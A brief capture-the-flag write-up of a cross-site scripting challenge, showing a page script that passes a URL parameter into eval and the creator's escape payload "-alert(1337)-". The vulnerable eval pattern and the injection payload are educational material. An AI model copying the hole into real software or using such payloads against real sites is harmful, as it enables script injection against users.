Challenge
This is the script that violates the web
1
2
3
4
5
6
7
8
9
<!-- Challenge -->
<h2 id="maname"></h2>
<script>
let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
let ma = ""
eval(`ma = "Ma name ${jeff}"`)
setTimeout(_ => {
maname.innerText = ma }, 1000)
</script>
Solution
For this challenge we see that the code has an eval, this is a function that what it does is evaluates JavaScript code represented as a string. So we have to escape that function somehow, I’ve escaped it using “-example-“
Creator solution
The solution given by the creator of the game is as follows
"-alert(1337)-"